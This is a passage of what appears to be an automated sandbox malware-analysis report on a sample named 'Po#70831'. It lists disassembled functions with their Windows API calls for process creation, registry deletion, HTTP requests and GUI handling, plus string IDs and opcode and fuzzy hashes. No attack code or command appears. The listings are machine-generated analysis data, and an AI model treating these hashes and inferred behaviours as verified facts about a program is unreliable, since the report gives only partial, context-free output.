                                      • Opcode Fuzzy Hash: 0deed138afa08ddff5b688b2b1183fdb525dbb4e3fa30f7476409a0a45e03519
                                      • Instruction Fuzzy Hash: B12131325407106BD7245B68BC06B5F3BA4EF16B52F00053BF801933D1DB785C04DAA8
                                      Function 005044C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(00000000,00000000,0052CC08), ref: 00504527
                                      • _wcslen.LIBCMT ref: 0050453B
                                      • _wcslen.LIBCMT ref: 00504599
                                      • _wcslen.LIBCMT ref: 005045F4
                                      • _wcslen.LIBCMT ref: 0050463F
                                      • _wcslen.LIBCMT ref: 005046A7
                                        • Part of subcall function 004AF9F2: _wcslen.LIBCMT ref: 004AF9FD
                                      • GetDriveTypeW.KERNEL32(?,00556BF0,00000061), ref: 00504743
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharDriveLowerType
                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 2055661098-1000479233
                                      • Opcode ID: 3f6ded74324b83fa8b40767322ea3fcfd75fac1232202d5db04279abb5f5ec7a
                                      • Instruction ID: 547235fc92c3c036c5b6b6182f830c8d7d3037ad327c1d50d08a1f0a76e1fcb9
                                      • Opcode Fuzzy Hash: 3f6ded74324b83fa8b40767322ea3fcfd75fac1232202d5db04279abb5f5ec7a
                                      • Instruction Fuzzy Hash: 5CB1F1B16083029FC710DF29C890A6EBBE4BFA5724F50492EF696872D1E734D845CB62
                                      Function 0052911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004A9BB2
                                      • DragQueryPoint.SHELL32(?,?), ref: 00529147
                                        • Part of subcall function 00527674: ClientToScreen.USER32(?,?), ref: 0052769A
                                        • Part of subcall function 00527674: GetWindowRect.USER32(?,?), ref: 00527710
                                        • Part of subcall function 00527674: PtInRect.USER32(?,?,00528B89), ref: 00527720
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 005291B0
                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005291BB
                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 005291DE
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00529225
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0052923E
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00529255
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00529277
                                      • DragFinish.SHELL32(?), ref: 0052927E
                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00529371
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#V
                                      • API String ID: 221274066-4064401564
                                      • Opcode ID: 4de6430ffbe4b50781a7dd37c3639c1aed90806fc4ebe066543c7df581bf062c
                                      • Instruction ID: e3b9444c8f0a349114b486fc8be24894da82e30dbf56100885d9e81e991fd3ee
                                      • Opcode Fuzzy Hash: 4de6430ffbe4b50781a7dd37c3639c1aed90806fc4ebe066543c7df581bf062c
                                      • Instruction Fuzzy Hash: 0C615771108301AFC701EF55D885DAFBFE8FF99354F00092EB595962A1DB30AA49CBA6
                                      Function 0051AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 0051B198
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0051B1B0
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0051B1D4
                                      • _wcslen.LIBCMT ref: 0051B200
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0051B214
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0051B236
                                      • _wcslen.LIBCMT ref: 0051B332
                                        • Part of subcall function 005005A7: GetStdHandle.KERNEL32(000000F6), ref: 005005C6
                                      • _wcslen.LIBCMT ref: 0051B34B
                                      • _wcslen.LIBCMT ref: 0051B366
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0051B3B6
                                      • GetLastError.KERNEL32(00000000), ref: 0051B407
                                      • CloseHandle.KERNEL32(?), ref: 0051B439
                                      • CloseHandle.KERNEL32(00000000), ref: 0051B44A
                                      • CloseHandle.KERNEL32(00000000), ref: 0051B45C
                                      • CloseHandle.KERNEL32(00000000), ref: 0051B46E
                                      • CloseHandle.KERNEL32(?), ref: 0051B4E3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                      • String ID:
                                      • API String ID: 2178637699-0
                                      • Opcode ID: e1a2208361cc51e8e6de87a75d76c8fdc141aaaf74e59ac038cb0528b6475303
                                      • Instruction ID: 550ad58acff12de4c2eec5a3f8a5720e6daaf3cb272d7e0990f233a9ccdb8dd1
                                      • Opcode Fuzzy Hash: e1a2208361cc51e8e6de87a75d76c8fdc141aaaf74e59ac038cb0528b6475303
                                      • Instruction Fuzzy Hash: A6F19E315083409FEB14EF25C885B6EBBE1BF85314F14895EF8959B2A2CB35EC84CB56
                                      Function 0049326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemCount.USER32(00561990), ref: 004D2F8D
                                      • GetMenuItemCount.USER32(00561990), ref: 004D303D
                                      • GetCursorPos.USER32(?), ref: 004D3081
                                      • SetForegroundWindow.USER32(00000000), ref: 004D308A
                                      • TrackPopupMenuEx.USER32(00561990,00000000,?,00000000,00000000,00000000), ref: 004D309D
                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004D30A9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                      • String ID: 0
                                      • API String ID: 36266755-4108050209
                                      • Opcode ID: 3a078c07e27b0829d2ab24a5f7634bbeaa3e36354bc7456f14682a1c9e2f27bb
                                      • Instruction ID: fd43e25bfdc41290c48a41f3403766328d86e87e97b24d46abf25e25bcc67291
                                      • Opcode Fuzzy Hash: 3a078c07e27b0829d2ab24a5f7634bbeaa3e36354bc7456f14682a1c9e2f27bb
                                      • Instruction Fuzzy Hash: 50713931640205BEEB218F24CD59FABBF64FF12324F20425BF5146A3E1C7B9A914DB99
                                      Function 00526CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,?), ref: 00526DEB
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00526E5F
                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00526E81
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00526E94
                                      • DestroyWindow.USER32(?), ref: 00526EB5
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00490000,00000000), ref: 00526EE4
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00526EFD
                                      • GetDesktopWindow.USER32 ref: 00526F16
                                      • GetWindowRect.USER32(00000000), ref: 00526F1D
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00526F35
                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00526F4D
                                        • Part of subcall function 004A9944: GetWindowLongW.USER32(?,000000EB), ref: 004A9952
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                      • String ID: 0$tooltips_class32
                                      • API String ID: 2429346358-3619404913
                                      • Opcode ID: ea71091beb99df286753e9859563de5a5a9d170dea1182b5f8706897187afd0d
                                      • Instruction ID: c484961886b22bad44300abb180330d966395fb70662bbf76435d107fcd49287
                                      • Opcode Fuzzy Hash: ea71091beb99df286753e9859563de5a5a9d170dea1182b5f8706897187afd0d
                                      • Instruction Fuzzy Hash: 6E714874104254AFDB21CF18EC84ABBBFE9FF9A304F14041EF999972A1D770A90ADB15
                                      Function 0050C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0050C4B0
                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0050C4C3
                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0050C4D7
                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0050C4F0
                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0050C533
                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0050C549
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0050C554
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0050C584
                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0050C5DC
                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0050C5F0
                                      • InternetCloseHandle.WININET(00000000), ref: 0050C5FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                      • String ID:
                                      • API String ID: 3800310941-3916222277
                                      • Opcode ID: 7822c476c47e89c1aba85f9a0cc273ec10b3e665d884e6c6c2ee923a8f79d05a
                                      • Instruction ID: c96be2ed3b4274a0386cfa92c27c33daa263e9f033d5446978a0426fb643b928
                                      • Opcode Fuzzy Hash: 7822c476c47e89c1aba85f9a0cc273ec10b3e665d884e6c6c2ee923a8f79d05a
                                      • Instruction Fuzzy Hash: 6A516DB4500605BFDB218F64CD88AAF7FBCFF1A354F04451DF94596291DB34E909ABA0
                                      Function 0052856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00528592
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285A2
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285AD
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285BA
                                      • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285C8
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285D7
                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285E0
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285E7
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285F8
                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0052FC38,?), ref: 00528611
                                      • GlobalFree.KERNEL32(00000000), ref: 00528621
                                      • GetObjectW.GDI32(?,00000018,?), ref: 00528641
                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00528671
                                      • DeleteObject.GDI32(?), ref: 00528699
                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 005286AF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                      • String ID:
                                      • API String ID: 3840717409-0
                                      • Opcode ID: 976310bf5ce72c96a5d758c6daea77e7ae36a7fec421584d0a03396e5a8c52e1
                                      • Instruction ID: 89be428854ae80c6f43d67bad63a612cec10c7883329a1b1238df75483fffdcd
                                      • Opcode Fuzzy Hash: 976310bf5ce72c96a5d758c6daea77e7ae36a7fec421584d0a03396e5a8c52e1
                                      • Instruction Fuzzy Hash: 87411875601214AFDB219FA5DC48EAE7FB8FFAA711F104058F905E72A1DB30A906DB60
                                      Function 005014BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(00000000), ref: 00501502
                                      • VariantCopy.OLEAUT32(?,?), ref: 0050150B
                                      • VariantClear.OLEAUT32(?), ref: 00501517
                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 005015FB
                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00501657
                                      • VariantInit.OLEAUT32(?), ref: 00501708
                                      • SysFreeString.OLEAUT32(?), ref: 0050178C
                                      • VariantClear.OLEAUT32(?), ref: 005017D8
                                      • VariantClear.OLEAUT32(?), ref: 005017E7
                                      • VariantInit.OLEAUT32(00000000), ref: 00501823
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                      • API String ID: 1234038744-3931177956
                                      • Opcode ID: 9dd2ff8aa9c5a69567d3787842805b2709577907c71a98547d10c5aa762639f5
                                      • Instruction ID: 8a20418504a8edeafee7a755819ebabc9a7c21bd8d10851a6fe4f7af6a534b4b
                                      • Opcode Fuzzy Hash: 9dd2ff8aa9c5a69567d3787842805b2709577907c71a98547d10c5aa762639f5
                                      • Instruction Fuzzy Hash: AED10031A00905EBDB20AF65E885B7DBBB5BF45704F14845AE406AF1C1DB34EC05DFAA
                                      Function 0051B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                        • Part of subcall function 0051C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0051B6AE,?,?), ref: 0051C9B5
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051C9F1
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051CA68
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051CA9E
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0051B6F4
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0051B772
                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 0051B80A
                                      • RegCloseKey.ADVAPI32(?), ref: 0051B87E
                                      • RegCloseKey.ADVAPI32(?), ref: 0051B89C
                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0051B8F2
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0051B904
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0051B922
                                      • FreeLibrary.KERNEL32(00000000), ref: 0051B983
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0051B994
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 146587525-4033151799
                                      • Opcode ID: 3c4b916e2b056c60fb890c0292785a4e09ffe2c3169298984992f82febb8dbb0
                                      • Instruction ID: 0740d49af78db1c94a37725027362f79b804853f2bd8b7ded2767f185eaf6c16
                                      • Opcode Fuzzy Hash: 3c4b916e2b056c60fb890c0292785a4e09ffe2c3169298984992f82febb8dbb0
                                      • Instruction Fuzzy Hash: E2C17C31204201AFE720DF15C495F6ABFE5FF84318F14855DE49A4B2A2CB75ED86CB91
                                      Function 0051255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 005125D8
                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005125E8
                                      • CreateCompatibleDC.GDI32(?), ref: 005125F4
                                      • SelectObject.GDI32(00000000,?), ref: 00512601
                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0051266D
                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 005126AC
                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 005126D0
                                      • SelectObject.GDI32(?,?), ref: 005126D8
                                      • DeleteObject.GDI32(?), ref: 005126E1
                                      • DeleteDC.GDI32(?), ref: 005126E8
                                      • ReleaseDC.USER32(00000000,?), ref: 005126F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                      • String ID: (
                                      • API String ID: 2598888154-3887548279
                                      • Opcode ID: 531f3de50d3d4380b8441b27f60dc6f51de81be0f2b4f1414be0b4758b578d5e
                                      • Instruction ID: 562598ef83f45ce2ef87aea350494f348fddb7987def817ed98da8bea87d3656
                                      • Opcode Fuzzy Hash: 531f3de50d3d4380b8441b27f60dc6f51de81be0f2b4f1414be0b4758b578d5e
                                      • Instruction Fuzzy Hash: B0611275D00219EFDF14CFA8C889AAEBBF6FF48300F208429E956A7250D730A951DF90
                                      Function 004CDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 004CDAA1
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD659
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD66B
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD67D
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD68F
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD6A1
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD6B3
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD6C5
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD6D7
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD6E9
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD6FB
